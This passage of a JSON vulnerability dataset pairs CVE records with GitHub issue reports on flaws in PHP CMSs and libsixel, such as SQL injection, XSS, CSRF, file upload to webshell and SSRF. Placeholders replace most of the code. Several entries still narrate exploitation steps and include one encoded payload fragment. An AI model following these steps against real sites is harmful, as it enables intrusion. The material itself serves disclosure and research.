  53032. "Issue_Url_new": "https://github.com/cby234/cve_request/issues/2",
  53033. "Repo_new": "cby234/cve_request",
  53034. "Issue_Created_At": "2021-05-17T10:07:19Z",
  53035. "description": "metinfo NUMBERTAG beta remote delete ini file. Vulnerability Name: Metinfo CMS ini file modify vulnerability Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG beta APITAG vulnerability only occurs in Windows OS) In PATHTAG APITAG Method FILETAG In this method We can find editor and site parameter makes filename value and use it for delfile method's argument FILETAG Let's take a look at PATHTAG source code FILETAG When we check delfile method we use filename argument for APITAG function and if return value is true unlink filename argument file will be unlink Before we analyze more about this point. Let's take a look at about APITAG function's difference between in Linux and Windows FILETAG FILETAG In Linux (first picture) if there is no real directory which name is asdf function do not return true value unless there is APITAG value. But In Windows APITAG function return true value if there is fake directory which name is asdf (second picture). Because of this point we can delete remote ini file in windows server Attack scenario is below NUMBERTAG give site parameter value for 'admin' or 'web' and give editor parameter for PATHTAG POC : PATHTAG FILETAG FILETAG FILETAG",
  53036. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  53037. "severity": "CRITICAL",
  53038. "baseScore": 9.1,
  53039. "impactScore": 5.2,
  53040. "exploitabilityScore": 3.9
  53041. },
  53042. {
  53043. "CVE_ID": "CVE-2020-20948",
  53044. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg/issues/50",
  53045. "Issue_Url_new": "https://github.com/zhangdaiscott/jeecg/issues/50",
  53046. "Repo_new": "zhangdaiscott/jeecg",
  53047. "Issue_Created_At": "2019-11-12T12:44:04Z",
  53048. "description": "There is a Arbitrary File Download vulnerability in NUMBERTAG From the FILETAG , we can figure out that we are able to access PATHTAG FILETAG and then we go to the source code: FILETAG as you can see, the variable \"imgurl\" is a direct combination of several strings ,and there is no filter for \"dbpath\", so we can use the payload to download any file APITAG By the way, the variable APITAG is configured in the file APITAG , and its default value is APITAG FILETAG So , if someone uses this application on Linux and modify the default value of APITAG to APITAG (or another location ) , then, an attacker can exploit it to read some sensitive file! FILETAG FILETAG",
  53049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  53050. "severity": "HIGH",
  53051. "baseScore": 7.5,
  53052. "impactScore": 3.6,
  53053. "exploitabilityScore": 3.9
  53054. },
  53055. {
  53056. "CVE_ID": "CVE-2020-20951",
  53057. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/84",
  53058. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/84",
  53059. "Repo_new": "pluck-cms/pluck",
  53060. "Issue_Created_At": "2019-10-21T11:36:30Z",
  53061. "description": "Pluck NUMBERTAG de NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. This vulnerability applies to php NUMBERTAG FILETAG After the installation is successful, go to the management background FILETAG Then upload FILETAG , It will be changed to FILETAG FILETAG Then upload FILETAG again FILETAG FILETAG has not been changed to FILETAG FILETAG then view FILETAG FILETAG",
  53062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53063. "severity": "CRITICAL",
  53064. "baseScore": 9.8,
  53065. "impactScore": 5.9,
  53066. "exploitabilityScore": 3.9
  53067. },
  53068. {
  53069. "CVE_ID": "CVE-2020-20971",
  53070. "Issue_Url_old": "https://github.com/TplusSs/PbootCMS/issues/1",
  53071. "Issue_Url_new": "https://github.com/tplusss/pbootcms/issues/1",
  53072. "Repo_new": "tplusss/pbootcms",
  53073. "Issue_Created_At": "2019-12-13T03:02:37Z",
  53074. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open this APITAG page FILETAG CODETAG Then open the PATHTAG page to see the added system administrator",
  53075. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53076. "severity": "HIGH",
  53077. "baseScore": 8.8,
  53078. "impactScore": 5.9,
  53079. "exploitabilityScore": 2.8
  53080. },
  53081. {
  53082. "CVE_ID": "CVE-2020-20977",
  53083. "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/6",
  53084. "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/6",
  53085. "Repo_new": "yxcmf/ukcms",
  53086. "Issue_Created_At": "2019-11-02T09:18:25Z",
  53087. "description": "APITAG NUMBERTAG APITAG alert NUMBERTAG APITAG \u63d0\u4ea4 FILETAG FILETAG NUMBERTAG FILETAG FILETAG",
  53088. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53089. "severity": "MEDIUM",
  53090. "baseScore": 5.4,
  53091. "impactScore": 2.7,
  53092. "exploitabilityScore": 2.3
  53093. },
  53094. {
  53095. "CVE_ID": "CVE-2020-20979",
  53096. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/2",
  53097. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/2",
  53098. "Repo_new": "0xyu/PHP_Learning",
  53099. "Issue_Created_At": "2019-10-14T15:08:06Z",
  53100. "description": "LJCMS Version NUMBERTAG R NUMBERTAG Arbitrary file upload vulnerability (latest version). Vulnerability Name : LJCMS Version NUMBERTAG R NUMBERTAG Arbitrary file upload vulnerability (latest version) Product Homepage : FILETAG Software link : FILETAG Version NUMBERTAG Location : PATHTAG Code \uff1a CODETAG NUMBERTAG Get the variable $_FILES NUMBERTAG Replace APITAG with APITAG NUMBERTAG Set the saved file name to time + random number + get the suffix name NUMBERTAG Set different save paths according to the file suffi NUMBERTAG Without any restrictions on the suffix name NUMBERTAG Executing APITAG caused an arbitrary file upload vulnerability test : So we can upload a normal photo first in the avatar upload. FILETAG modify, Upload success FILETAG getshell FILETAG",
  53101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53102. "severity": "CRITICAL",
  53103. "baseScore": 9.8,
  53104. "impactScore": 5.9,
  53105. "exploitabilityScore": 3.9
  53106. },
  53107. {
  53108. "CVE_ID": "CVE-2020-20981",
  53109. "Issue_Url_old": "https://github.com/yao123123123/CVE/issues/1",
  53110. "Issue_Url_new": "https://github.com/yao123123123/cve/issues/1",
  53111. "Repo_new": "yao123123123/CVE",
  53112. "Issue_Created_At": "2019-11-03T02:55:47Z",
  53113. "description": "Metinfo NUMBERTAG APITAG Vulnerability Name: Metinfo CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG PATHTAG Line NUMBERTAG public function APITAG global $_M; $id = isset($_M FILETAG second\uff1a\uff1b poc:id FILETAG If set the code as NUMBERTAG we can find delete the log data success. FILETAG",
  53114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  53115. "severity": "HIGH",
  53116. "baseScore": 7.5,
  53117. "impactScore": 3.6,
  53118. "exploitabilityScore": 3.9
  53119. },
  53120. {
  53121. "CVE_ID": "CVE-2020-20982",
  53122. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/1",
  53123. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/1",
  53124. "Repo_new": "shadoweb/wdja",
  53125. "Issue_Created_At": "2019-10-23T09:01:20Z",
  53126. "description": "There is a reflected XSS vulnerability. Click the url below: URLTAG PATHTAG NUMBERTAG Then you will see the alert window. Attacker could use the vulnerability to steal admin's cookie and log in as the admin account",
  53127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  53128. "severity": "CRITICAL",
  53129. "baseScore": 9.6,
  53130. "impactScore": 6.0,
  53131. "exploitabilityScore": 2.8
  53132. },
  53133. {
  53134. "CVE_ID": "CVE-2020-21003",
  53135. "Issue_Url_old": "https://github.com/Computer2200/-/issues/3",
  53136. "Issue_Url_new": "https://github.com/computer2200/-/issues/3",
  53137. "Repo_new": "Computer2200/-",
  53138. "Issue_Created_At": "2020-01-01T05:31:19Z",
  53139. "description": "Pbootcms NUMBERTAG background storage XSS. step1 Access admin page FILETAG FILETAG step2 URLTAG FILETAG step3 FILETAG step4 FILETAG",
  53140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53141. "severity": "MEDIUM",
  53142. "baseScore": 4.8,
  53143. "impactScore": 2.7,
  53144. "exploitabilityScore": 1.7
  53145. },
  53146. {
  53147. "CVE_ID": "CVE-2020-21005",
  53148. "Issue_Url_old": "https://github.com/Computer2200/-/issues/4",
  53149. "Issue_Url_new": "https://github.com/computer2200/-/issues/4",
  53150. "Repo_new": "Computer2200/-",
  53151. "Issue_Created_At": "2020-01-01T14:00:15Z",
  53152. "description": "APITAG NUMBERTAG Getshell. Step1\uff1a Login the CMS background: FILETAG Step2\uff1a Enter \"background management\", locate the utilization point, click the picture in the red box below to upload: FILETAG Upload and grab data packets: FILETAG Step NUMBERTAG modify the \"filetype\" parameter type in the post package to \"PHP\"; after analysis, the \"data\" parameter is Base NUMBERTAG encrypted. Here we will construct the test data \" APITAG through base NUMBERTAG encryption and other structures to form the data of the\" data \"parameter: Data NUMBERTAG aimage NUMBERTAG fjpeg NUMBERTAG bbase NUMBERTAG cpd9wahagcghwaw5mbygpoz NUMBERTAG B\uff0c Finally, the data package is released and the path to upload to PHP file is returned Path: FILETAG Finally, success: FILETAG Try connecting shells again: Payload: APITAG FILETAG Connect shell successfully: FILETAG APITAG Locate the code file according to the vulnerability: route / FILETAG The code is as follows: if ($action == 'create') { // hook FILETAG APITAG // hook FILETAG $backstage = param NUMBERTAG width = param('width NUMBERTAG height = param('height NUMBERTAG is_image = param('is_image NUMBERTAG name = param('name'); $data = param_base NUMBERTAG data'); $mode = param('mode NUMBERTAG filetype = param('filetype'); // \u538b\u7f29\u56fe\u7247\u540e\u7f00jpeg jpg png\u7b49 $convert = param('convert NUMBERTAG n = param('n NUMBERTAG type = param('type NUMBERTAG type NUMBERTAG SESSION\u6570\u7ec4\u9644\u4ef6\u6570\u91cf\u7edf\u8ba1\uff0ctype NUMBERTAG n\u6570\u503c // hook FILETAG // \u5141\u8bb8\u7684\u6587\u4ef6\u540e\u7f00\u540d //$types = include APITAG //$allowtypes = $types['all']; empty($group['allowattach']) AND $gid NUMBERTAG AND message NUMBERTAG hook FILETAG empty($data) AND message NUMBERTAG lang('data_is_empty')); //$data = APITAG $size = strlen($data); $size NUMBERTAG AND message NUMBERTAG lang('filesize_too_large', array('maxsize NUMBERTAG M', 'size' => $size))); // hook FILETAG // 
\u83b7\u53d6\u6587\u4ef6\u540e\u7f00\u540d APITAG $ext = file_ext($name NUMBERTAG filetypes = include APP_PATH . APITAG // hook FILETAG //\u4e3b\u56fe\u5fc5\u987b\u4e3a\u56fe\u7247 if ($is_image NUMBERTAG mode NUMBERTAG in_array($ext, $filetypes['image'])) message NUMBERTAG APITAG // hook FILETAG // \u5982\u679c\u6587\u4ef6\u540e\u7f00\u4e0d\u5728\u89c4\u5b9a\u8303\u56f4\u5185 \u6539\u53d8\u540e\u7f00\u540d //!in_array($ext, $filetypes['all']) AND $ext = '_' . $ext; if (!in_array($ext, $filetypes['all'])) { $ext = '_' . $ext; } else { // CMS\u4e0a\u4f20\u56fe\u7247 $t NUMBERTAG AND $convert NUMBERTAG AND $is_image NUMBERTAG AND $ext = $filetype; } // hook FILETAG $tmpanme = $uid . '_' . xn_rand NUMBERTAG ext; // hook FILETAG $tmpfile = $conf['upload_path'] . 'tmp/' . $tmpanme; // hook FILETAG $tmpurl = $conf['upload_url'] . 'tmp/' . $tmpanme; // hook FILETAG $filetype = attach_type($name, $filetypes); // hook FILETAG file_put_contents($tmpfile, $data) OR message NUMBERTAG APITAG // hook FILETAG // \u4fdd\u5b58\u5230 session\uff0c\u53d1\u5e16\u6210\u529f\u4ee5\u540e\uff0c\u5173\u8054\u5230\u5e16\u5b50\u3002 // save attach information to session, associate to post after create thread. // \u629b\u5f03\u4e4b\u524d\u7684 $_SESSION \u6570\u636e\uff0c\u91cd\u65b0\u542f\u52a8 session\uff0c\u964d\u4f4e session \u5e76\u53d1\u5199\u5165\u7684\u95ee\u9898 // Discard the previous $_SESSION data, restart the session, reduce the problem of concurrent session write APITAG empty($t) AND empty($_SESSION['tmp_files']) AND $_SESSION['tmp_files'] = APITAG $t NUMBERTAG AND APITAG AND APITAG = APITAG // hook FILETAG // type NUMBERTAG SESSION\u6570\u7ec4\u9644\u4ef6\u6570\u91cf\u7edf\u8ba1\uff0ctype NUMBERTAG n\u6570\u503c empty($type) AND $n = ($t NUMBERTAG APITAG : APITAG $filesize = filesize($tmpfile); $attach = array( 'backstage' => $backstage NUMBERTAG url' => $backstage ? '../' . $tmpurl : '' . 
$tmpurl, 'path' => $tmpfile, 'orgfilename' => $name, 'filetype' => $filetype, 'filesize' => $filesize, 'width' => $width, 'height' => $height, 'isimage' => $is_image, 'downloads NUMBERTAG aid' => '_' . $n ); // hook FILETAG if ($mode NUMBERTAG hook FILETAG $_SESSION['tmp_thumbnail'] = $attach; // hook FILETAG } else { // hook FILETAG NUMBERTAG BBS NUMBERTAG CMS $t NUMBERTAG APITAG = $attach : $_SESSION['tmp_files'][$n] = $attach; // hook FILETAG } // hook FILETAG unset($attach['path']); // hook FILETAG message NUMBERTAG attach); } General process NUMBERTAG First, accept the relevant parameters and set the filetype to \"PHP\" by itself: $data = param_base NUMBERTAG data'); $filetype = param('filetype NUMBERTAG Make logical judgment: if (!in_array($ext, $filetypes['all'])) { $ext = '_' . $ext; } else { //CMS upload picture $t NUMBERTAG AND $convert NUMBERTAG AND $is_image NUMBERTAG AND $ext = $filetype NUMBERTAG Last write successful: $tmpanme = $uid . '_' . xn_rand NUMBERTAG ext; // hook FILETAG $tmpfile = $conf['upload_path'] . 'tmp/' . $tmpanme; // hook FILETAG $tmpurl = $conf['upload_url'] . 'tmp/' . $tmpanme; // hook FILETAG $filetype = attach_type($name, $filetypes); // hook FILETAG file_put_contents($tmpfile, $data) OR message NUMBERTAG APITAG",
  53153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  53154. "severity": "MEDIUM",
  53155. "baseScore": 6.5,
  53156. "impactScore": 3.6,
  53157. "exploitabilityScore": 2.8
  53158. },
  53159. {
  53160. "CVE_ID": "CVE-2020-21013",
  53161. "Issue_Url_old": "https://github.com/emlog/emlog/issues/52",
  53162. "Issue_Url_new": "https://github.com/emlog/emlog/issues/52",
  53163. "Repo_new": "emlog/emlog",
  53164. "Issue_Created_At": "2019-10-31T08:09:34Z",
  53165. "description": "emlog has SQL injection vulnerability. vulnerability in FILETAG line NUMBERTAG CODETAG vulnerability in PATHTAG line NUMBERTAG ERRORTAG vulnerability in PATHTAG line NUMBERTAG ERRORTAG Login Required admin. The token parameter constructed is the value of \"EM_TOKENCOOKIE_...\" in the cookie. action=delbyip ip NUMBERTAG and APITAG APITAG POC\uff1a CODETAG FILETAG",
  53166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  53167. "severity": "HIGH",
  53168. "baseScore": 7.2,
  53169. "impactScore": 5.9,
  53170. "exploitabilityScore": 1.2
  53171. },
  53172. {
  53173. "CVE_ID": "CVE-2020-21014",
  53174. "Issue_Url_old": "https://github.com/emlog/emlog/issues/53",
  53175. "Issue_Url_new": "https://github.com/emlog/emlog/issues/53",
  53176. "Repo_new": "emlog/emlog",
  53177. "Issue_Created_At": "2019-10-31T09:50:06Z",
  53178. "description": "emlog has any file deletion vulnerability. vulnerability in FILETAG line NUMBERTAG ERRORTAG Get any filepath as \"plugin\" , will delete it. The token parameter constructed is the value of \"EM_TOKENCOOKIE_...\" in the cookie. Login management background and view APITAG GET plugin=anyfile,like FILETAG something. POC: CODETAG FILETAG FILETAG",
  53179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  53180. "severity": "MEDIUM",
  53181. "baseScore": 6.5,
  53182. "impactScore": 5.2,
  53183. "exploitabilityScore": 1.2
  53184. },
  53185. {
  53186. "CVE_ID": "CVE-2020-21048",
  53187. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/73",
  53188. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/73",
  53189. "Repo_new": "saitoha/libsixel",
  53190. "Issue_Created_At": "2018-07-28T11:57:09Z",
  53191. "description": "Multiple crashes when converting png files. Our fuzzer detected several crashes when converting png files against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC can be: heap buffer overflow FILETAG FILETAG gdb output is like: ERRORTAG two aborts (linked with libpng NUMBERTAG there is a similar issue as observed in URLTAG FILETAG FILETAG FILETAG FILETAG gdb outputs are like: ERRORTAG Other system information: ERRORTAG",
  53192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53193. "severity": "MEDIUM",
  53194. "baseScore": 6.5,
  53195. "impactScore": 3.6,
  53196. "exploitabilityScore": 2.8
  53197. },
  53198. {
  53199. "CVE_ID": "CVE-2020-21049",
  53200. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/74",
  53201. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/74",
  53202. "Repo_new": "saitoha/libsixel",
  53203. "Issue_Created_At": "2018-07-28T12:00:04Z",
  53204. "description": "Address Sanitizer: invalid read at APITAG Our fuzzer detected several crashes when converting PSD file against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC is: FILETAG gdb output: CODETAG",
  53205. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53206. "severity": "MEDIUM",
  53207. "baseScore": 6.5,
  53208. "impactScore": 3.6,
  53209. "exploitabilityScore": 2.8
  53210. },
  53211. {
  53212. "CVE_ID": "CVE-2020-21050",
  53213. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/75",
  53214. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/75",
  53215. "Repo_new": "saitoha/libsixel",
  53216. "Issue_Created_At": "2018-07-28T12:04:34Z",
  53217. "description": "APITAG stack buffer overflow at APITAG Our fuzzer detected several crashes when converting gif file against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC can be: FILETAG FILETAG gdb output is like: ERRORTAG",
  53218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53219. "severity": "MEDIUM",
  53220. "baseScore": 6.5,
  53221. "impactScore": 3.6,
  53222. "exploitabilityScore": 2.8
  53223. },
  53224. {
  53225. "CVE_ID": "CVE-2020-21081",
  53226. "Issue_Url_old": "https://github.com/magicblack/maccms8/issues/2",
  53227. "Issue_Url_new": "https://github.com/magicblack/maccms8/issues/2",
  53228. "Repo_new": "magicblack/maccms8",
  53229. "Issue_Created_At": "2019-10-28T08:33:24Z",
  53230. "description": "APITAG xss \u5728\u540e\u53f0\u7ba1\u7406\u5458\u6587\u7ae0\u7ba1\u7406\u5904\uff0c\u6dfb\u52a0\u548c\u4fee\u6539\u5b58\u5728xss\u6f0f\u6d1e \u5728\u8f93\u5165\u4e2d\u6587\u540d\u548c\u82f1\u6587\u540d\u7684\u5730\u65b9\uff0c\u540e\u9762\u8f93\u5165 APITAG \uff0c\u5982\u4e0b\u56fe FILETAG APITAG FILETAG \u524d\u7aef\u9875\u9762\u9f20\u6807\u79fb\u5230\u6807\u9898\u4e0a\u4e5f\u4f1a\u5f39\u51fa\u7528\u6237cookie FILETAG csrf \u53d1\u73b0\u5728\u6dfb\u52a0\u548c\u4fee\u6539\u7684\u5730\u65b9\u540c\u65f6\u5b58\u5728csrf \u5229\u7528\u524d FILETAG \u5f53\u6784\u9020\u5982\u4e0b\u9875\u9762\uff0c\u8bf1\u5bfc\u7ba1\u7406\u5458\u70b9\u51fb CODETAG \u5f53\u7ba1\u7406\u5458\u8bbf\u95ee\u70b9\u51fb\u9875\u9762 FILETAG \u6210\u529f\u6dfb\u52a0\u5206\u7c7b FILETAG csrf+xss APITAG CODETAG APITAG FILETAG",
  53231. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  53232. "severity": "MEDIUM",
  53233. "baseScore": 6.5,
  53234. "impactScore": 3.6,
  53235. "exploitabilityScore": 2.8
  53236. },
  53237. {
  53238. "CVE_ID": "CVE-2020-21087",
  53239. "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/162",
  53240. "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/162",
  53241. "Repo_new": "x2engine/x2crm",
  53242. "Issue_Created_At": "2018-11-06T11:20:22Z",
  53243. "description": "Stored XSS in module name. Hi again. Description: XSS in module name will prompt in all other pages of NUMBERTAG CRM CE NUMBERTAG Sample Pic: FILETAG Payload to use : \"> APITAG Tested on Windows NUMBERTAG Firefox | Google Chrome // Cent OS NUMBERTAG Firefox | Chromium BR, Milad Fadavvi",
  53244. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53245. "severity": "MEDIUM",
  53246. "baseScore": 6.1,
  53247. "impactScore": 2.7,
  53248. "exploitabilityScore": 2.8
  53249. },
  53250. {
  53251. "CVE_ID": "CVE-2020-21088",
  53252. "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/183",
  53253. "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/183",
  53254. "Repo_new": "x2engine/x2crm",
  53255. "Issue_Created_At": "2021-02-11T06:35:05Z",
  53256. "description": "Multiple Cross Site Scripting in NUMBERTAG CRM NUMBERTAG Hi, I have found the multiple stored XSS in the NUMBERTAG crm version NUMBERTAG I like to report them and get the CVE. Location: URLTAG Parameter: Last Name Payload inserted FILETAG Execution of the payload FILETAG Location: URLTAG Parameter: comments payload inserted FILETAG Execution of the payload FILETAG",
  53257. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53258. "severity": "MEDIUM",
  53259. "baseScore": 4.8,
  53260. "impactScore": 2.7,
  53261. "exploitabilityScore": 1.7
  53262. },
  53263. {
  53264. "CVE_ID": "CVE-2020-21088",
  53265. "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/161",
  53266. "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/161",
  53267. "Repo_new": "x2engine/x2crm",
  53268. "Issue_Created_At": "2018-11-06T11:12:54Z",
  53269. "description": "Stored XSS in Contact first name and last name. Hi, Description: Create a contact with first name: test\"> APITAG and last name : test2\"> APITAG (you can even delete the contact, which is worse!) XSS will run in all pages where the activity feed is present. ( in NUMBERTAG CRM CE NUMBERTAG Sample Pic: FILETAG Payload to use : \"> APITAG Tested on Windows NUMBERTAG Firefox | Google Chrome // Cent OS NUMBERTAG Firefox | Chromium BR, Milad Fadavvi",
  53270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53271. "severity": "MEDIUM",
  53272. "baseScore": 4.8,
  53273. "impactScore": 2.7,
  53274. "exploitabilityScore": 1.7
  53275. },
  53276. {
  53277. "CVE_ID": "CVE-2020-21101",
  53278. "Issue_Url_old": "https://github.com/Screenly/screenly-ose/issues/1254",
  53279. "Issue_Url_new": "https://github.com/screenly/anthias/issues/1254",
  53280. "Repo_new": "screenly/anthias",
  53281. "Issue_Created_At": "2019-11-12T11:55:32Z",
  53282. "description": "Cross Site Scripting APITAG vulnerability. Describe the bug Suggested description of the vulnerability : A stored cross site scripting (XSS) vulnerability in the APITAG Asset' page of Screenly OSE allows a remote attacker to introduce arbitrary JavaScript via manipulation of the 'URL' field. Attack vector(s) FILETAG NUMBERTAG Press the APITAG Asset' button in the upper right corner. FILETAG NUMBERTAG Enter ERRORTAG in the APITAG URL' field. FILETAG NUMBERTAG When accessing the main page APITAG Overview' menu), arbitrary code is executed. APITAG same vulnerability occurs when uploading to a file other than a URL.) Affected URL/API(s) APITAG Environment Raspberry Pi Hardware Version: Model NUMBERTAG B+ Revision NUMBERTAG Ram NUMBERTAG GB Sony UK Screenly OSE Version NUMBERTAG Screenly OSE lite.img",
  53283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53284. "severity": "MEDIUM",
  53285. "baseScore": 5.4,
  53286. "impactScore": 2.7,
  53287. "exploitabilityScore": 2.3
  53288. },
  53289. {
  53290. "CVE_ID": "CVE-2020-21122",
  53291. "Issue_Url_old": "https://github.com/youseries/ureport/issues/483",
  53292. "Issue_Url_new": "https://github.com/youseries/ureport/issues/483",
  53293. "Repo_new": "youseries/ureport",
  53294. "Issue_Created_At": "2019-11-29T04:20:17Z",
  53295. "description": "An unauthorized SSRF vulnerability in the designer page.. In this part of source code, we find that users can make connection requests to any IP address. FILETAG Then we found that the designer page did not verify the access user's permission. So we can directly implement the SSRF attack on this page to detect the database port of the intranet device. FILETAG FILETAG When the database port is detected to be open, the page will respond to the database login failure. FILETAG",
  53296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  53297. "severity": "MEDIUM",
  53298. "baseScore": 5.3,
  53299. "impactScore": 1.4,
  53300. "exploitabilityScore": 3.9
  53301. },
  53302. {
  53303. "CVE_ID": "CVE-2020-21124",
  53304. "Issue_Url_old": "https://github.com/youseries/ureport/issues/484",
  53305. "Issue_Url_new": "https://github.com/youseries/ureport/issues/484",
  53306. "Repo_new": "youseries/ureport",
  53307. "Issue_Created_At": "2019-11-29T05:25:46Z",
  53308. "description": "Local malicious class loading and code execution vulnerability due to unauthorized access to the designer page. With the following source code, we can easily find that the 'Class.forName' method can load malicious classes. FILETAG APITAG is a method for the JVM to retrieve a class and load it into memory. In this process, the static initialization phase of class loading is executed. In other words, if a malicious class is defined in advance, you can execute the static code block of the malicious class here. FILETAG We successfully execute the code by loading the malicious classes set in advance. FILETAG",
  53309. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53310. "severity": "CRITICAL",
  53311. "baseScore": 9.8,
  53312. "impactScore": 5.9,
  53313. "exploitabilityScore": 3.9
  53314. },
  53315. {
  53316. "CVE_ID": "CVE-2020-21125",
  53317. "Issue_Url_old": "https://github.com/youseries/ureport/issues/485",
  53318. "Issue_Url_new": "https://github.com/youseries/ureport/issues/485",
  53319. "Repo_new": "youseries/ureport",
  53320. "Issue_Created_At": "2019-11-30T06:24:02Z",
  53321. "description": "Remote code execution vulnerability due to arbitrary file creation.. We find the stored part of this file by searching the key functions. FILETAG View calls in this section FILETAG Network truncation of parameter transfer in this part. FILETAG Try to modify to JSP webshell. FILETAG The error reported here is an error occurred during XML parsing, but the file has been written into the server. FILETAG Find this directory. FILETAG Of course, this directory can't access JSP. Try to cross directory with relative path. FILETAG FILETAG Successfully cross directory and get webshell. FILETAG",
  53322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53323. "severity": "CRITICAL",
  53324. "baseScore": 9.8,
  53325. "impactScore": 5.9,
  53326. "exploitabilityScore": 3.9
  53327. },
  53328. {
  53329. "CVE_ID": "CVE-2020-21126",
  53330. "Issue_Url_old": "https://github.com/Echox1/metinfo_csrf/issues/1",
  53331. "Issue_Url_new": "https://github.com/echox1/metinfo_csrf/issues/1",
  53332. "Repo_new": "echox1/metinfo_csrf",
  53333. "Issue_Created_At": "2019-12-02T08:00:27Z",
  53334. "description": "There is a csrf via APITAG to update the admin user. There is a csrf via APITAG to update the admin user account request: ERRORTAG payload: CODETAG use burpsuite test FILETAG",
  53335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53336. "severity": "HIGH",
  53337. "baseScore": 8.8,
  53338. "impactScore": 5.9,
  53339. "exploitabilityScore": 2.8
  53340. },
  53341. {
  53342. "CVE_ID": "CVE-2020-21127",
  53343. "Issue_Url_old": "https://github.com/T3qui1a/metinfo_sqlinjection/issues/1",
  53344. "Issue_Url_new": "https://github.com/t3qui1a/metinfo_sqlinjection/issues/1",
  53345. "Repo_new": "t3qui1a/metinfo_sqlinjection",
  53346. "Issue_Created_At": "2019-12-02T12:43:03Z",
  53347. "description": "There is a sqlinjection via APITAG FILETAG line NUMBERTAG line NUMBERTAG FILETAG the parameter \"id\" can be inject FILETAG payload: CODETAG",
  53348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53349. "severity": "CRITICAL",
  53350. "baseScore": 9.8,
  53351. "impactScore": 5.9,
  53352. "exploitabilityScore": 3.9
  53353. },
  53354. {
  53355. "CVE_ID": "CVE-2020-21130",
  53356. "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/7",
  53357. "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/7",
  53358. "Repo_new": "hisiphp/hisiphp",
  53359. "Issue_Created_At": "2019-10-31T12:49:29Z",
  53360. "description": "from CSRF to stored XSS Stealing administrator cookies. When adding a group FILETAG it has CSRF to add a group FILETAG then it has stored XSS FILETAG CSRF poc CODETAG",
  53361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53362. "severity": "MEDIUM",
  53363. "baseScore": 6.1,
  53364. "impactScore": 2.7,
  53365. "exploitabilityScore": 2.8
  53366. },
  53367. {
  53368. "CVE_ID": "CVE-2020-21131",
  53369. "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/3",
  53370. "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/3",
